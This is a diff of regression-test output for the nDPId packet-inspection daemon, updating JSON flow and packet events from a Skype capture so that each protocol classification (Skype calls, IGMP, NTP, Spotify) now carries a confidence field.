+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00533{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1431969751302,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":12,"ts_msec":1431969751302,"pkt":"AQBeAAAB0NQSxnP1CABGwAAkAABAAAECQmnAqAEB4AAAAZQEAAARZOweAAAAAAJ9AAAAAAAAAAAAAAAA"}
-00566{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00592{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1431969759543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1431969759543,"pkt":"0NQSxnP1PBXCt3IOCABFwABMl\/4AAEAR3SbAqAEiEf0w9QB7AHsAOFSa4wIG7AAAChwAAPSnEf0w9dkEndkb+ycx2QSd2Rb0\/7nZBJ3ZG\/snMdkEnl+LA3WC"}
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"},"ntp": {"request_code":0,"version":0}}
+00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2763,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1431969759588,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1431969759588,"pkt":"PBXCt3IO0NQSxnP1CABFAABMAABAADgRPeUR\/TD1wKgBIgB7AHsAOA1EJAEG7AAAAAAAAAAMR1BTc9kEnl2e8n962QSeX4sDdYLZBJ5fkbdSxdkEnl+RubQR"}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00652{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969668503,"flow_last_seen":1431969758516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
